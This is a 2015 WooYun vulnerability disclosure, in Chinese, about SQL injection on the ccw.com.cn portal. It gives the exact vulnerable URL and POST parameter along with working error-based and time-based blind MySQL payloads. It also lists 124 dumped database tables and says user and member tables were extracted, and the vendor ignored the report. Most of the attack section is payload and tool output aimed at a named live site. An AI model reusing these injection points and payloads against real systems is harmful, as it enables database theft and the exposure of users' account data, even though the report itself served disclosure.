缺陷编号:WooYun-2015-0127819
漏洞标题:计世网主站存在sql注入漏洞泄露用户信息(含大量账号密码)
相关厂商:计世网
漏洞作者:littelfire
提交时间:2015-07-20 11:40
公开时间:2015-07-25 11:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-25: 厂商已经主动忽略漏洞,细节向公众公开
计世网主站存sql注入漏洞
计世网主站存sql注入漏洞,可脱库,可获取所有用户信息
首先是注入点:http://www.ccw.com.cn/space/eyan_more/11550 post:page=2&pagesize=20
1 2 3 4 5 6 |
Parameter: pagesize (POST)<br> Type: error-based<br> Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)<br> Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(6581,CONCAT(0x5c,0x71626b6a71,(SELECT (CASE WHEN (6581=6581) THEN 1 ELSE 0 END)),0x71786b7171)),1)Type: AND/OR time-based blind<br> Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)<br> Payload: page=2&pagesize=20 PROCEDURE ANALYSE(EXTRACTVALUE(8607,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x76445476))))),1) |
通过注入可以跑出数据库信息
可查看数据库
跑出itjia库中的124个表
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 |
+-----------------------+<br> | appinfo |<br> | auth_codes |<br> | dalao |<br> | ex_applycio |<br> | ex_arbor |<br> | ex_attachment |<br> | ex_bchy |<br> | ex_buchonghangye |<br> | ex_ca2014 |<br> | ex_caexpo |<br> | ex_card |<br> | ex_card_group |<br> | ex_card_ship |<br> | ex_cardrefuse_ship |<br> | ex_ccw_index_focus |<br> | ex_cioforum |<br> | ex_cioforum2013 |<br> | ex_ciopw |<br> | ex_ciopx2012 |<br> | ex_ciotp |<br> | ex_cisco |<br> | ex_citrix |<br> | ex_city |<br> | ex_collection |<br> | ex_collection_group |<br> | ex_comment |<br> | ex_community |<br> | ex_dmf2013 |<br> | ex_edm |<br> | ex_emc |<br> | ex_emc_feedback |<br> | ex_emc_user |<br> | ex_emcbiao |<br> | ex_emcuser |<br> | ex_emcverify |<br> | ex_event |<br> | ex_event_user |<br> | ex_eyan |<br> | ex_eyanip |<br> | ex_haocio_comment |<br> | ex_huawei |<br> | ex_huaweiuser |<br> | ex_ibm |<br> | ex_intel |<br> | ex_it2013 |<br> | ex_itjiaodian4 |<br> | ex_jiaodian5 |<br> | ex_jiaodian_base |<br> | ex_jp |<br> | ex_letter_status |<br> | ex_live |<br> | ex_live_comment |<br> | ex_live_content |<br> | ex_meeting |<br> | ex_meeting_access |<br> | ex_meeting_ad |<br> | ex_meeting_apply |<br> | ex_meeting_comment |<br> | ex_meeting_file |<br> | ex_meeting_position |<br> | ex_meeting_reply |<br> | ex_meeting_user |<br> | ex_meeting_video |<br> | ex_member |<br> | ex_message |<br> | ex_minisite |<br> | ex_noteset |<br> | ex_offline_huigu |<br> | ex_offline_lianxi |<br> | ex_offline_menpiao |<br> | ex_offline_news |<br> | ex_offline_richeng |<br> | ex_offline_zanzhu |<br> | ex_offline_zuzhi |<br> | ex_online_bmb |<br> | ex_online_bmbfield |<br> | ex_online_jiabin |<br> | ex_online_jiangpin |<br> | ex_online_zhuchi |<br> | ex_onwall |<br> | ex_pro_tag |<br> | ex_recommend |<br> | ex_release |<br> | ex_reply |<br> | ex_role |<br> | ex_rsa |<br> | ex_setting |<br> | ex_shouye |<br> | ex_shouye2show |<br> | ex_snw2014 |<br> | ex_snw2014_tech |<br> | ex_special |<br> | ex_special_comment |<br> | ex_special_eyanlist |<br> | ex_special_report |<br> | ex_subscribe_cio |<br> | ex_subscribe_man |<br> | ex_subscribe_tag |<br> | ex_system_tag |<br> | ex_tag |<br> | ex_tag_relation |<br> | ex_trade |<br> | ex_tuwenlive |<br> | ex_tvforum |<br> | ex_tvrelease |<br> | ex_user |<br> | ex_user_chengjiu |<br> | ex_user_cominfo |<br> | ex_user_company |<br> | ex_user_education |<br> | ex_user_menu |<br> | ex_user_privacy |<br> | ex_user_profile |<br> | ex_user_role |<br> | ex_user_role_menu |<br> | ex_user_status |<br> | ex_user_weibo |<br> | ex_video |<br> | ex_videointerview_old |<br> | ex_weight_tag |<br> | ex_yaoqing |<br> | ex_ztsafe |<br> | tokens |<br> | zhongjiang |<br> +-----------------------+ |
跑了一下ex_user表和ex_member表中的数据
做好过滤
危害等级:无影响厂商忽略
忽略时间:2015-07-2511:42
漏洞Rank:15 (WooYun评价)
暂无
原文连接
的情况下转载,若非则不得使用我方内容。